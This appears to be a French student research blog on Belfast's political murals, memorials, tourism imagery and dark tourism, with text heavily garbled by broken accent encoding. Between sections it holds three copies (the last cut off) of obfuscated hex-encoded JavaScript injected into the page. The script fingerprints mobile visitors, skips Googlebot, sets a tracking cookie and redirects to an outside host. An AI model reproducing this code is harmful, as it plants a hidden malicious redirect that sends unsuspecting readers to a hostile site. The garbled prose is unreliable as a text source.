Le message est limpide, Nelson Mandela a combattu un rA�gime politique illA�gitime et violent et a A�tA� emprisonnA�, tout comme Bobby Sands. On peut aussi voir, non loin du lieu oA? plusieurs personnes ont A�tA� tuA�es pendant le Bloody Sunday, une reproduction du Tres de mayo de Goya (ci dessous) pour rappeler les tirs des parachutistes sur des civils, ce qui peut s’apparenter A� une exA�cution sommaire. Cette dA�marche de victimisation est encore plus efficace en utilisant des symboles internationaux et un registre mA�moriel connus de tous.

Capture da��A�cran 2016-05-23 A� 18.00.12

Lorsque la��on observe les murals du parti loyaliste, on trouve une rA�fA�rence frA�quente A� un peuple A�extA�rieur la��aidant A� justifier sa position. Cette rA�fA�rence revient au peuple israA�lien en contexte de conflit israA�lo-palestinien. En effet, le parti loyaliste est en accord avec le fond idA�ologique, la forme de la��A�tat et aussi avec le mode da��action, plus gA�nA�ralement, est da��accord avec la��attitude inflexible de la��A�tat IsraA�l ainsi que sur ses actions militaires envers les terroristes et la population civile. De plus les loyalistes expliquent qua��IsraA�l est le pays le plus prospA?re A�conomiquement de la rA�gion, donc le modA?le qui ressort le plus gagnant de la situation de conflit. Ils mettent ce point de vue en lien avec la situation de la��Irlande du Nord, considA�rant que la rA�gion doit sa rA�ussite da��antan A� son intA�gration dans la Grande-Bretagne.A�Les protestants, eux plutA?t que de prendre une position victimaire, justifient leurs actions violentes en rA�actions aux actes terroristes des unionistes.

Victimisation des partis

Nous faisons la��usage dans cette partie du terme victimisation et de ses dA�rivA�s. Nous entendons par a�?victimisera�? la��acte ou parole visant A� rendre son parti victime aux regards de la population extA�rieure au conflit, ainsi qua��en tant que justification des actions offensives ou dA�fensives envers la��autre camp. Aussi, da��aprA?s la DA�claration des Principes Fondamentaux de Justice Relatifs aux Victimes de la criminalitA� et aux victimes d’abus de pouvoir, lesA�victimes sont dA�finies comme a�?des personnes qui, individuellement ou collectivement, ont subi un prA�judice, notamment une atteinte A� leur intA�gritA� physique ou mentale, une souffrance morale, une perte matA�rielle, ou une atteinte grave A� leurs droits fondamentaux, en raison d’actes A�ou d’omissions qui A�enfreignent A�les A�lois pA�nales en vigueur A�dans A�un A�Etat membre, A�y A�comprisA�celles qui proscrivent les abus criminels de pouvoir.a�?

  • MA�moriel des victimes

IMG_09372222

Le but du mA�morial est de rendre hommage A� des victimes de guerres ou da��A�vA?nements particuliA?rement tragiques. Le mA�morial sert aussi A� commA�morer un A�vA?nement important pour une communautA� en terme de changement A�conomique, politique ou social. Le monument, ou le lieu, mis A� disposition na��est pas simplement un espace ou un objet concret, il contient une dimension abstraite et il est vecteur da��une mA�moire collective. Ainsi, les lieux de mA�moires sont respectA�s par toute personne concernA�e parA�la morale collective, quasiment universelle, liA�e au respect des morts et de ce qui les englobe.

Au travers deA�ces mA�moriaux, on rend hommage A� des victimes et on permet A�galement le deuil collectif de la communautA� concernA�e. La ville de Belfast possA?de un grand nombre de mA�moriauxA�dont la plupart sont situA�s principalement dans les quartiers encore sA�paratistes. Cela sa��explique enA�raisonA�des nombreux conflits intra-muros subis dA?sA�1920 avec le projet da��autonomie de la��Irlande, alorsA�sous la domination de la Grande-Bretagne rA�gisA�par Home Rule. Ca��est A� partir de cette proposition que des tensions entre les rA�publicains nationalistes de Belfast et les loyalistes unionistes dA�butA?rent, prenant de plus en plus da��ampleur et menant A� plusieurs conflits civils, appelA�s troubles, jusque dans les annA�es 1990. Ca��est parce que ces conflits engendrA?rent de nombreux morts que la mise en place de monuments mA�moriaux fut nA�cessaire. NA�anmoins, il semblerait que malgrA� les actes de paix conclusA�entreA�les communautA�s de Belfast, les dissensionsA�perdurent au sein mA?me de ces lieux de mA�moire. En effet, le cas de Belfast est particulier puisqua��on trouve dans la ville des mA�moriaux peints, accompagnA�s de murals colorA�es relatives aux troubles. Sur ces murals on peut apercevoir des visages de personnalitA�s importantes dans les conflits aux cA?tA�s de symboles liA�s aux religions ou aux cultures des deux partis.

On peut considA�rerA�que la rA�alisation da��un monument mA�moriel reprA�sente en quelques sortes une prise de position A� partir du moment oA? la��on rend hommage aux morts da��un seul camp et pas de la��autre. A�On peut donc considA�rer que le spectateur – supposA� neutre – va se placer automatiquement da��un cA?tA� ou de la��autre des deux camps. En ajoutant, comme A� Belfast, des visages et des symboles trA?s dA�taillA�s aux mA�moriaux, la sensibilitA� du spectateur est touchA�e car celui ci va sa��identifier plus facilement aux partisans du mA�morial. Le spectateur est nettement moins A�mu sa��il na��a en face de lui qua��une liste de noms de victimes auxquelles il ne peut se rA�fA�rer. En revanche, il est fort probable qu’un touriste, pA?re de famille, voyant en face de luiA�se dresser une peinture murale reprA�sentant des enfants expliquantA�que ces derniersA�furentA�tuA�s par les forces da��un des deux partis, le pA?reA�va se sentir concernA� et son opinion sur le conflit en sera influencA�e. Il est fort probable que la��image associA�e A� la description favorise cette sensation. Le monument, alors envisagA� comme vecteur da��idA�e pacifiste au premier abord, aurait plutA?t tendance A� faire perdurer la conflictualitA�, da��autant plus sa��il est accompagnA� par une mural renforA�ant le pouvoir da��identification sur leA�spectateur.

Sachant que le dark tourism est trA?s dA�veloppA� dans cette ville, on peut A�mettre la��hypothA?se que les mA�moriaux aux victimes ne sont pas uniquement crA�A�s pour les populations locales et protagonistes du conflit mais qua��elles se dirigent vers les touristes. En effet, il est possible que les murals peintes aux cA?tA�s des mA�moriaux soient mobilisA�es afin de victimiser le parti concernA� envers la��autre et face A� la��opinion internationale. Ainsi, grA?ce A� la dimension sensiblement touchante de la jonction mA�morial-murals, les partis se victimisent et se dA�chargent donc en partie de la responsabilitA� des dommages humains et matA�riels dus aux troubles.

Nous avons donc vu que la justification des actions des partis dans les conflits est prA�sente au travers de symboles dans les murals. Nous avons prA�cA�demment avancA� la��idA�e que les partis cherchent A� rallier les observateurs extA�rieurs aux conflits dans leur camp, en disposant notamment les murals de maniA?re A� toucher le spectateur et A� se placer en tant que victime dans le conflit. Dans cette partie nous expliquerons comment ce mA?me processus de victimisation est prA�sent dans les textes des murals. GrA?ce au plan dA�taillA� du site http://www.belfast-murals.co.uk, un A�chantillon de cinquante murals (vingt cinq murals unionistes et vingt cinq murals loyalistes) fut utilisA� afin da��A�tudier le champ lexical utilisA� dans ces peintures. Nous chercherons A� montrer que les deux partis ne font pas usage des mA?mes mots et que cela traduit deux maniA?res da��expliquer le conflit. Le tableau ci dessous rA�pertorie les rA�sultats de la��analyse de contenu.

content analysisNous pouvons donc observer dans notre A�chantillon grA?ce au tableau plusieurs champs lexicaux ressortant des mots utilisA�s pour reprA�senter les partis unionistes et loyalistes. Ces champs lexicaux sont de trois ordres : la lutte, les rA�fA�rences territoriales et communautaires et le post-conflictualisme.

  • Analyse du champs lexical de la lutte :

Le tableau prA�cA�dent montreA�que le parti loyaliste utilise plus de mots liA�s A� la lutte que le parti nationaliste. Le mot militantsA�est visible sur environ vingt pour cent des murals loyalistes (da��aprA?s notre A�chantillon de vingt cinq murals) tandis que le mot le plus frA�quemment utilisA� pour les rA�publicains est resistance. Ces deux mots ne sont pas en opposition mais ne se dA�finissent pas de la mA?me maniA?re; ainsi da��aprA?s la dA�finition anglaise du site Merriam Webster, militant signifie A� having or showing A�a A�desire A�or A�A�willingness A�A�to A�use A�A�strong, A�A�extreme, A�A�A�and A�A�A�A�A�sometimes forceful methods to achieve somethingA�A? (Simple dA�finition of militants [en ligne] http://www.merriam-webster.com/dictionary/militant) Ce mot est donc synonyme en anglais da��action politique ou idA�ologique violente. En ce qui concerne le mot resistance, toujours da��aprA?s la mA?me source, la dA�finition est la suivante : A�refusal to accept something new or different A� ou A�effort made to stop or to fight against someone or something A�A? (Simple dA�finition of resistance [en ligne] http://www.merriam-webster.com/dictionary/resistance). Autrement dit, la��acte de rA�sistance na��inclue pas nA�cessairement un acte violent.

En tenant compte des autres mots utilisA�s par le parti loyaliste tels que guns, attacked, conflict on rA�aliseA�la diffA�rente vision des troubles par chacun des partis. Pour parler du conflit, le parti loyaliste fait A�plus appel A�A�la dimension brutale et armA�e du conflit. A� l’opposA�, le parti rA�publicain utilise les mots brave, oppression, fall, faisant plutA?t rA�fA�rence A� un champ lexical de la survie. Les rA�publicains se dA�crivent donc plus comme A�tant en position dominA�e ou alors en position de subsistance face A� une force supA�rieure politique opposA�e et offensive. A�

  • Analyse du champs lexical post-conflictualiste:

En ce qui concerne la dimension post-conflictualiste, les murals des deux camps font une utilisation commune de mots tel que freedom. La��usage de ce mot (libertA�) pourrait faire rA�fA�rence A� la��ultime but vers lequel tend la ville de Belfast. La diffA�rence da��usage du mot par les deux partis rA�side ici dans les extensions employA�es. En effet, freedom est utilisA� sous diffA�rentes dA�rivA�es par le parti nationaliste rA�publicain, on peut donc lire dans les quartiers rA�publicains les termes free, free union ou encore liberation A� plusieurs localisations.

Le deuxiA?me mot le plus utilisA� par le parti loyaliste unioniste est murder, alors que celui na��est visible qua��une seule fois de la��autre cA?tA� du conflit. Nous pouvons noter A�galement que la devise du parti loyaliste : A� no surrender A� apparait deux fois parmi notre A�chantillon. Ce slogan est A�A�contre-sensA�de la��idA�ologie pacifiste puisque qua��elle se traduit par A� ne pas renoncer A�. Elle est depuis longtemps utilisA�e par le parti, qui considA?re que les conflits na��auront de fin que lorsque la��autre camp aura cA�dA�, autrement dit, le parti pour la gouvernance anglaise exprime son mA�contentement envers la��idA�e de trouver un terrain da��entente mettant fin aux tensions.

Les deux partis font enfin rA�fA�rence aux victimes et aux combattants ayant servit leur communautA�. La��usage de murder est frA�quent pour les loyalistes tandis qua��il na��apparaA�t qua��une fois chez les nationalistes. Enfin, on peut noter le terme martyrs utilisA� par les nationalistes, impliquant directement la souffrance notamment da��aprA?s le dictionnaire anglais Merriam Webster A�a�?a person who is killed or who suffers greatly for a religion, cause, etc..a�? (simple definition of martyr [en ligne] http://www.merriam-webster.com/dictionary/martyr)

Plus largement, il est remarquable que les partis anglais voient en la situation post-conflit un espoir de victoire progressive sur le camp opposA�. A l’inverse, le vocabulaire utilisA� par les nationalistes, pourrait indiquer que ceux ci revendiquent une plus forte volontA� de paix. De plus, ces derniers font un usage frA�quent de mots relatifs au martyre et A� une position, encore, de victimes premiA?res de ces troubles.

  • Analyse du champs lexical de territorialitA� et de communautarisme:

Ce champ lexical est peu reprA�sentA� comparA� aux deux autres ressortis de la��A�tude, nA�anmoins on peut remarquer deux niveaux da��appartenance des partis.

Le parti rA�publicains nationaliste A� tendanceA�A� valoriser les origines celtiques et irlandaises tandis que le parti loyaliste lA�gitime directement sa prA�sence en Ireland du Nord de part la��appropriation des toponymes Ulster, North Belfast. Ce parti loyaliste se considA?re A�galement comme une A�quipe (team) alors que la��on retrouve plutA?t la��idA�e de communautA� du cA?tA� des nationalistes. Enfin, on peut remarquer au sein de notre A�chantillon une diffA�rence da��A�chelle lorsqua��il sa��agit des protagonistes du conflits. En effet nous pouvons trouver dans les murals loyalistes le terme royalty, menant directement au sommet de la gouvernance recherchA�e, alors que les nationalistes emploient le terme civil A� deux reprises. La volontA� de reprA�senter les populations concernA�es dans le conflit est donc diffA�rente selon les partis, la vision est soit micro, soit macro.

A la suite de cette analyse de contenu, nousA�distinguons deux mentalitA�s. En effet, nous avons observA� que les partis na��A�valuent pas de la mA?me maniA?re leur rA?le dans le conflit. Quand les loyalistes prA?nent la puissance de leurs armA�es et troupes militantes qui ne renonceront jamais A� la lutte, les nationalistes, A� la��opposA�, na��A�voquent pratiquement pas leurs actions violentes dans le conflit. Au contraire, aprA?s cette analyse nous pouvons remarquer que ceux ci ont tendance A� A�voquer leurs forces de rA�sistances et donc intrinsA?quement, leur statut de victime en recherche de processus de paix. Quant au registre de justification, l’analyse de contenu dA�montre queA�les anglais loyalistes justifient leurs actions en faisant rA�fA�rence textuellement A� leur connaissance du territoire nord-irlandais afin de prouver leur prA�sence ancienne et comme A� logique A� sur ce territoire. Ainsi, ils lA�gitiment les troubles et assument la dA�fense da��un territoire qua��ils considA?rent acquis. En parallA?le, les irlandais rA�publicains remontent jusqua��aux origines celtiques pour revendiquer leur appartenance A� un peuple irlandais avant mA?me la��existence dune population anglo-irlandaise.

Symboles les plus prA�sents
Symboles les plus prA�sents

cliquer pour agrandir le tableau

MA�thode utilisA�e :

Afin de rA�aliser au mieux notre enquA?te nous avons eu besoin da��obtenir de la��information formelle et de la��information informelle; mais principalement da��informations qualitatives. Nous avons A�galement optA� pour une approche interprA�tative, ca��est A� dire da��A�tudier les sources A� notre disposition afin de comprendre la culture en question.

Continuer la lecture de Des symboles pour se justifier

Mur des super-hA�ros

Par Christina Zholdokova, Laetitia Valentin &A�VA�roniqueA�Battier

Introduction

Les rues de Belfast regorgent de fresques murales faisant pour la plupart rA�fA�rence au conflit inter-confessionnel, mais certaines ont cependant un caractA?re non-partisan. La��objet de ce travail est de se demander sa��il est possible, A� travers la peinture da��un mur, de transiter A� une optique plus pacifiste, non violente ou non conflictualiste tout en gardant la tradition des fresques murales, remontant A� la��A�poque du conflit.

Notre projet tourne principalement autour de la fresque des super-hA�ros se situant dans le quartier de Sliabh Dubh sur Springfield Road. La��objectif de la rA�alisation de cette peinture A�tait la cohA�sion sociale du quartier dans lequel elle se trouve. Nous cherchons A� dA�terminer si cet objectif a effectivement A�tA� atteint, notamment par la��observation de la��insertion de cette fresque dans la��espace public, ainsi que via des interviews de plusieurs personnes pouvant nous renseigner sur le sujet.

Est-il possible, A� travers le processus des murals, de dA�passer les divisions politiques issues du conflit Nord-Irlandais en reprA�sentant des images non-partisanes?

[cliquez sur les liens en vert pour accA�der aux diffA�rentes parties A�de l'article]

MA�thodologie

DonnA�es et Analyse

Situation des murals sur la carte:

Galerie de photos

Bibliographie commentA�e

Annexe

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Images des Murals en circulation dans le tourisme

A� Quelles representations des murals de Belfast alimentent un cercle da��images? Quelles significations ce cercle prend-il dans le contexte post-conflictuel de la ville? A�

Par Nicole Frazier, Simon Paratte & LA�a Zignani

a�? INTRODUCTION

Chaque anneI?e, 9.5 millions de touristes visitent la ville de Belfast. Les murals font indA�niablement partis de la��offre touristique de la ville. A travers notre voyage da��A�tude et sa prA�paration, nous nous intA�ressons au sujet des images de murals en circulation auprA?s des touristes. Notre objectif est de constituer un A�chantillon de reprA�sentations des murals adressA�es aux touristes, se rA�pA�tant sur des documents leurs A�tant destinA�s, formant ainsi un cercle da��image.

Pour ce faire, nous nous penchons sur diverses sources, telles que des visites organisA�es dans le cadre du voyage da��A�tude. Nous rajoutons aI� cela une analyse de documents rA�coltA�s ainsi que des mirco-trottoirs effectuA�s sur place.
Nous tentons ici de constituer une collection de ces images rA�currentes, tout en A�tudiant les agents les mettant en circulation ca��est-A�-dire les acteurs du tourisme ainsi que les touristes eux-mA?mes ; mais aussi les motifs qua��elles reprA�sentent. Nous nous interrogeons notamment sur les explications et les raisons possibles derriA?re la redondance da��images des murals les plus reprA�sentA�s.


a�? INTRODUCTION

a�? PARTIE THA�MATIQUE
A�
a�? CONCLUSION
A�

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dark tourism A� Belfast

Notre travail sa��inscrit dans la thA�matique du tourisme, et plus prA�cisA�ment, dans le dark tourism, cette forme de tourisme est indirectement et intimement liA�e aux catastrophes humaines et naturelles, et donc A� la mort et A� la��atrocitA�. Nous allons rapporter ce thA?me A� la ville de Belfast qui fut le terrain da��affrontements violents ayant conduis A� la construction de frontiA?res physiques. MA?me si aujourda��hui le conflit a A�tA� officiellement rA�solu et que de ce fait, le but des peace walls na��est plus le mA?me qua��autrefois, ces murs et les fresques qui les recouvrent ne peuvent se dA�tacher de la caractA�ristique sinistre qui leur est associA�e et qui a A�tA� au fondement mA?me de leur construction.

Dans cette optique, nous tenterons da��expliquer dans quelle mesure la��offre touristique A� Belfast repose sur une logique propre au dark tourism. Pour ce faire, nous nous focaliserons au prA�alable sur la��offre touristique et sur comment ces lieux sont prA�sentA�s et notamment A� travers la��analyse de divers documents tels que les flyers, sites internets et guides touristique. Sur place, nous nous concentrerons sur les discours des acteurs de la��offre touristique et sur la maniA?re dont les tours sont prA�sentA�s. Le questionnement quant A� la mobilisation et la��instrumentalisation de la mort et des atrocitA�s commises en ces lieux sera central dans notre recherche . Nous sommes en effet face A� une forme de tourisme atypique et inhabituelle. Il sa��agit da��explorer si les diffA�rents acteurs de la��offre exploitent cette originalitA�.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 